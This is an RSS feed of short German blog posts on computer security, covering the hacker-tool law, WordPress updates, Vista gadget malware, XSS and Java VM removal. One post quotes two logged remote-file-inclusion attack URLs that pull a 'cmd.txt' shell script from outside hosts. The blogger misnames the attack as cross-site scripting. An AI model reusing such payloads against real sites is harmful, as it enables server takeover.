<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>kumbula.net &#187; Sicherheit</title>
	<atom:link href="http://kumbula.net/category/sicherheit/feed" rel="self" type="application/rss+xml" />
	<link>http://kumbula.net</link>
	<description>this is the kumbula network</description>
	<lastBuildDate>Tue, 08 Nov 2011 07:29:15 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Dann war es wohl doch nicht strafbar&#8230;</title>
		<link>http://kumbula.net/netzwelt/540/dann-war-es-wohl-doch-nicht-strafbar</link>
		<comments>http://kumbula.net/netzwelt/540/dann-war-es-wohl-doch-nicht-strafbar#comments</comments>
		<pubDate>Thu, 14 Aug 2008 13:21:11 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[kurioses]]></category>
		<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/?p=540</guid>
		<description><![CDATA[Wie hier bereits schon mal erwähnt, gab es ja diese Geschichte mit dem Hackerparagraphen und dem Tool-Upload. Der Vollständigkeit halber möchte ich hier festhalten, dass die Geschichte zu Ende ist, weil das Verfahren eingestellt wurde (ohne dabei Grundlegendes zu klären). Nachzulesen hier im spitblog. Fiel mir heute wieder ein und sah dazu mal nach.]]></description>
			<content:encoded><![CDATA[<p>Wie <a href="http://kumbula.net/netzwelt/387/hackertools-dann-werden-wir-ja-definitiv-sehen-obs-strafbar-ist-oder-nicht">hier</a> bereits schon mal erwähnt, gab es ja diese Geschichte mit dem Hackerparagraphen und dem Tool-Upload. Der Vollständigkeit halber möchte ich hier festhalten, dass die Geschichte zu Ende ist, weil das Verfahren eingestellt wurde (ohne dabei Grundlegendes zu klären).<br />
Nachzulesen <a href="http://www.spitblog.de/2008/02/17/hackertoolparagraph-202c-verfahren-eingestellt/">hier im spitblog</a>.<br />
Fiel mir heute wieder ein und sah dazu mal nach.</p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/540/dann-war-es-wohl-doch-nicht-strafbar/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.3 und Datenschutz</title>
		<link>http://kumbula.net/netzwelt/395/wordpress-23-und-datenschutz</link>
		<comments>http://kumbula.net/netzwelt/395/wordpress-23-und-datenschutz#comments</comments>
		<pubDate>Tue, 25 Sep 2007 16:14:39 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/395/wordpress-23-und-datenschutz</guid>
		<description><![CDATA[Da freu ich mich (nicht wirklich) über ein neuerlich fälliges Update meiner 20 Blogs und der Nachricht, dass es einen Auto-Updater gibt der das ganze in Zukunft erleichtern soll. Da sieht es so aus, als ob das eine miese Schnüffelnummer ist oder zumindest potentielles Unheil birgt. Update verschoben bis ich mehr Zeit dazu hab. Der [...]]]></description>
			<content:encoded><![CDATA[<p>Da freu ich mich (nicht wirklich) über ein neuerlich fälliges Update meiner 20 Blogs und der Nachricht, dass es einen Auto-Updater gibt der das ganze in Zukunft erleichtern soll. Da sieht es so aus, als ob das eine miese Schnüffelnummer ist oder zumindest potentielles Unheil birgt. Update verschoben bis ich mehr Zeit dazu hab.<br />
<a href="http://www.tamagothi.de/2007/09/23/datenschutzproblem-in-wordpress-23">Der Nachtwächter weiß in seinem Blog mehr dazu.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/395/wordpress-23-und-datenschutz/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>The InstantUpgrade plugin</title>
		<link>http://kumbula.net/netzwelt/389/the-instantupgrade-plugin</link>
		<comments>http://kumbula.net/netzwelt/389/the-instantupgrade-plugin#comments</comments>
		<pubDate>Thu, 13 Sep 2007 14:22:25 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/389/the-instantupgrade-plugin</guid>
		<description><![CDATA[Nur &#8216;ne schnelle Notiz: ein Instantupgrade-Plugin welches WordPress auf Knopfdruck upgraded. Mal mit mehr Zeit ansehen&#8230;.später. zirona.com &#8211; The InstantUpgrade plugin]]></description>
			<content:encoded><![CDATA[<p>Nur &#8216;ne schnelle Notiz: ein Instantupgrade-Plugin welches WordPress auf Knopfdruck upgraded. Mal mit mehr Zeit ansehen&#8230;.später.</p>
<p><a href="http://www.zirona.com/software/wordpress-instant-upgrade/">zirona.com &#8211; The InstantUpgrade plugin</a></p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/389/the-instantupgrade-plugin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;Hackertools&#8221;: &#8220;Dann werden wir ja definitiv sehen, ob&#8217;s strafbar ist oder nicht.&#8221; *Update*</title>
		<link>http://kumbula.net/netzwelt/387/hackertools-dann-werden-wir-ja-definitiv-sehen-obs-strafbar-ist-oder-nicht</link>
		<comments>http://kumbula.net/netzwelt/387/hackertools-dann-werden-wir-ja-definitiv-sehen-obs-strafbar-ist-oder-nicht#comments</comments>
		<pubDate>Thu, 13 Sep 2007 13:19:07 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[kurioses]]></category>
		<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/387/hackertools-dann-werden-wir-ja-definitiv-sehen-obs-strafbar-ist-oder-nicht</guid>
		<description><![CDATA[&#8220;BRAVO!&#8221; kann ich da sagen und schmeiss mich weg. Da hosted jemand einfach ein paar Tools und zeigt sich selber an um zu sehen inwieweit der &#8220;Hackerparagraph&#8221; einschlägt oder nicht. Die ganze Geschichte: Originalpost auf spitblog.de gulli.com Viel Erfolg dabei! Ich bin gespannt wie es weiter geht. Update: Mehr dazu und das Fax: auch auf [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;BRAVO!&#8221; kann ich da sagen und schmeiss mich weg.</p>
<p>Da hosted jemand einfach ein paar Tools und zeigt sich selber an um zu sehen inwieweit der &#8220;Hackerparagraph&#8221; einschlägt oder nicht.</p>
<p>Die ganze Geschichte:</p>
<p><a href="http://www.spitblog.de/2007/09/06/naegel-mit-koepfen/">Originalpost auf spitblog.de</a><br />
<a href="http://www.gulli.com/news/hackertools-securityexperte-2007-09-13/">gulli.com</a></p>
<p>Viel Erfolg dabei!<br />
Ich bin gespannt wie es weiter geht.</p>
<p><strong>Update:</strong><br />
Mehr dazu und das Fax: auch auf <a href="http://www.spitblog.de/2007/09/10/selbstanzeige/">spitblog.de</a></p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/387/hackertools-dann-werden-wir-ja-definitiv-sehen-obs-strafbar-ist-oder-nicht/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Die neue Malware-Generation</title>
		<link>http://kumbula.net/netzwelt/386/die-neue-malware-generation</link>
		<comments>http://kumbula.net/netzwelt/386/die-neue-malware-generation#comments</comments>
		<pubDate>Thu, 13 Sep 2007 10:28:22 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/386/die-neue-malware-generation</guid>
		<description><![CDATA[Next generation malware: Windows Vista&#8217;s gadget API Wie Tim Brown auf der Sicherheitsmailingliste Full Disclosure schreibt, sind die neue Generation der Windows-Schädlinge HTML-basierte Widgets. Dass Windows HTML-Elemente auf Taskbar und Dekstop einbinden kann ist seit NT 4.0 nichts neues, allerdings lief dieser innerhalb einer Art Sandbox im Betriebsystem und konnte hier keinen Schaden anrichten. Aber [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Next generation malware: Windows Vista&#8217;s gadget API</strong></p>
<p>Wie Tim Brown auf der <a href="http://seclists.org/fulldisclosure/2007/Sep/0206.html">Sicherheitsmailingliste Full Disclosure</a> schreibt, sind die neue Generation der Windows-Schädlinge HTML-basierte Widgets.<br />
Dass Windows HTML-Elemente auf Taskbar und Dekstop einbinden kann ist seit NT 4.0 nichts neues, allerdings lief dieser innerhalb einer Art Sandbox im Betriebsystem und konnte hier keinen Schaden anrichten.<br />
Aber seit der neuen Windows Vista API ist es nun möglich und zweifelsohne wird es nicht lange dauern bis das auch die Cracker und bösen Buben entdecken.<br />
Tim verweist auf ein Whitepaper von <a href="http://www.portcullis-security.com/165.php">portcullis-security.com</a>:</p>
<blockquote><p>Next generation malware: Windows Vista&#8217;s gadget API Windows has had the ability to embed HTML into it&#8217;s user interface for many years. Right back to and including Windows NT 4.0, it has been possible to embed HTML into the task bar, but the OS has always maintained a sandbox, from which the HTML has been unable to escape. All this changes with Windows Vista.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/386/die-neue-malware-generation/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.2.3 *Update*</title>
		<link>http://kumbula.net/netzwelt/383/wordpress-223</link>
		<comments>http://kumbula.net/netzwelt/383/wordpress-223#comments</comments>
		<pubDate>Thu, 13 Sep 2007 09:07:05 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/383/wordpress-223</guid>
		<description><![CDATA[Und wieder eine neue WordPress-Version. Jedes Update ist für mich immer ein kleiner Update-Marathon mit ca. 20 Blogs die auf den aktuellen Stand gebracht werden wollen. *Ächz* Aber Sicherheit geht vor, also fleißig geupdated. [Update] Da hing heise.de aber kräftig hinterher: bis heute hat es gedauert (5 Tage), bis deren Meldung dazu kam. Was war [...]]]></description>
			<content:encoded><![CDATA[<p>Und wieder eine neue <a href="http://wordpress.org/development/2007/09/wordpress-223/">WordPress-Version</a>. Jedes Update ist für mich immer ein kleiner Update-Marathon mit ca. 20 Blogs die auf den aktuellen Stand gebracht werden wollen. *Ächz*<br />
Aber Sicherheit geht vor, also fleißig geupdated. <img src='http://kumbula.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong>[Update]</strong></p>
<p>Da hing <a href="http://www.heise.de/security/news/meldung/95920/WordPress-2-2-3-schliesst-Sicherheitsluecken">heise.de</a> aber kräftig hinterher: bis heute hat es gedauert (5 Tage), bis deren Meldung dazu kam. Was war nur los? LAG?</p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/383/wordpress-223/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Passwortklau für Dummies</title>
		<link>http://kumbula.net/netzwelt/384/passwortklau-fur-dummies</link>
		<comments>http://kumbula.net/netzwelt/384/passwortklau-fur-dummies#comments</comments>
		<pubDate>Tue, 11 Sep 2007 22:52:47 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/384/passwortklau-fur-dummies</guid>
		<description><![CDATA[&#8230; oder warum Cross Site Scripting wirklich ein Problem ist. Ein toller Artikel auf heise.de über Cross-Site-Scripting und böses Javascript. Lesen und schlauer sein!]]></description>
			<content:encoded><![CDATA[<p><em> &#8230; oder warum Cross Site Scripting wirklich ein Problem ist.</em></p>
<p>Ein <a href="http://www.heise.de/security/artikel/94100">toller Artikel auf heise.de</a> über Cross-Site-Scripting und böses Javascript.<br />
Lesen und schlauer sein!</p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/384/passwortklau-fur-dummies/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ach du dickes Ei &#8211; Websaftsack am Start &#8211; Update</title>
		<link>http://kumbula.net/sicherheit/374/ach-du-dickes-ei-websaftsack-am-start</link>
		<comments>http://kumbula.net/sicherheit/374/ach-du-dickes-ei-websaftsack-am-start#comments</comments>
		<pubDate>Wed, 18 Jul 2007 05:00:21 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[kumbula.network]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/sicherheit/374/ach-du-dickes-ei-websaftsack-am-start</guid>
		<description><![CDATA[Ei ei ei, was haben wir denn hier im 404-Log: http://kumbula.net/category/include/main.php?config [search_disp]=true&#038;include_dir=http://br.geocities.com/edmidg/cmd.txt? War wieder der High-Level-Scripting-L33t-Haxx0r-Bot am Start? Leck mich! Update: Da hat sich wohl jemand &#8216;ne neue Domain besorgt nachdem die bei Geocities gesperrt wurde. *flöt* 404: http://kumbula.net/include/main.php?config [search_disp]=true&#038;include_dir=http://edl.yoll.net/cmd.txt? Der Clou an der Sache ist, dass das ein Cross-Site-Scripting-Angriff auf osTicket ist, ein ganz [...]]]></description>
			<content:encoded><![CDATA[<p>Ei ei ei, was haben wir denn hier im 404-Log:</p>
<blockquote><p>http://kumbula.net/category/include/main.php?config<br />
[search_disp]=true&#038;include_dir=http://br.geocities.com/edmidg/cmd.txt?</p></blockquote>
<p>War wieder der High-Level-Scripting-L33t-Haxx0r-Bot am Start?</p>
<p>Leck mich! </p>
<p>Update:<br />
Da hat sich wohl jemand &#8216;ne neue Domain besorgt nachdem die bei Geocities gesperrt wurde. *flöt* <img src='http://kumbula.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<blockquote><p>404: http://kumbula.net/include/main.php?config<br />
[search_disp]=true&#038;include_dir=http://edl.yoll.net/cmd.txt?</p></blockquote>
<p>Der Clou an der Sache ist, dass das ein Cross-Site-Scripting-Angriff auf osTicket ist, ein ganz nettes Ticketsystem, was aber schon lange nicht mehr hier läuft. Gut für mich, doof für den schlimmen Finger.</p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/sicherheit/374/ach-du-dickes-ei-websaftsack-am-start/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nahezu kostenlose Firewall von Ashampoo</title>
		<link>http://kumbula.net/netzwelt/91/nahezu-kostenlose-firewall-von-ashampoo</link>
		<comments>http://kumbula.net/netzwelt/91/nahezu-kostenlose-firewall-von-ashampoo#comments</comments>
		<pubDate>Thu, 24 Aug 2006 12:31:18 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://kumbula.net/netzwelt/91/nahezu-kostenlose-firewall-von-ashampoo</guid>
		<description><![CDATA[Es gibt eine personal Firewall für privaten wie gewerblichen Einsatz lediglich für eine Email-Adresse. Auf heise.de kann man mehr lesen: http://www.heise.de/newsticker/meldung/77209]]></description>
			<content:encoded><![CDATA[<p>Es gibt eine personal Firewall für privaten wie gewerblichen Einsatz lediglich für eine Email-Adresse. Auf heise.de kann man mehr lesen:<br />
<a href="http://www.heise.de/newsticker/meldung/77209">http://www.heise.de/newsticker/meldung/77209</a></p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/netzwelt/91/nahezu-kostenlose-firewall-von-ashampoo/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mircrosoft Java Virtual Machine deinstallieren</title>
		<link>http://kumbula.net/randnotiz/51/mircrosoft-java-virtual-machine-deinstallieren</link>
		<comments>http://kumbula.net/randnotiz/51/mircrosoft-java-virtual-machine-deinstallieren#comments</comments>
		<pubDate>Sun, 06 Aug 2006 21:01:07 +0000</pubDate>
		<dc:creator>ossi</dc:creator>
				<category><![CDATA[Hardware]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Netzwelt]]></category>
		<category><![CDATA[Randnotiz]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[verschiedenes]]></category>

		<guid isPermaLink="false">http://kumbula.net/randnotiz/51/mircrosoft-java-virtual-machine-deinstallieren</guid>
		<description><![CDATA[Die M$-VM ist eine bekannte Sicherheitslücke im System&#8230; &#8230;daher ist das einer der ersten Schritte wenn ich ein System neu aufsetzte. Hier die Kurzanleitung. start > ausführen eingabe : RunDLL32 advpack.dll, launchINFSection javaINFUnInstall mit Ja bestätigen un Neustarten in der registry hkey_local_machine/software/microsoft/javaVM und hkey_local_machine/software/microsoft/internet explorer/addvancedoption/java_vm löschen löschen von : %systemroot%\java ordner java.pnf im Ordner %systemroot%\inf [...]]]></description>
			<content:encoded><![CDATA[<p>Die M$-VM ist eine bekannte Sicherheitslücke im System&#8230; &#8230;daher ist das einer der ersten Schritte wenn ich ein System neu aufsetzte. Hier die Kurzanleitung.</p>
<p>start > ausführen</p>
<p>eingabe :<br />
RunDLL32 advpack.dll, launchINFSection javaINFUnInstall</p>
<p>mit Ja bestätigen un Neustarten</p>
<p>in der registry</p>
<p>hkey_local_machine/software/microsoft/javaVM und<br />
hkey_local_machine/software/microsoft/internet explorer/addvancedoption/java_vm löschen</p>
<p>löschen von :</p>
<p>%systemroot%\java ordner<br />
java.pnf im Ordner %systemroot%\inf<br />
jview.exe und wjview.exe in %systemroot%\system32</p>
<p>Neustart</p>
<p>sun java installieren</p>
<p>http://www.java.com/de/</p>
]]></content:encoded>
			<wfw:commentRss>http://kumbula.net/randnotiz/51/mircrosoft-java-virtual-machine-deinstallieren/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

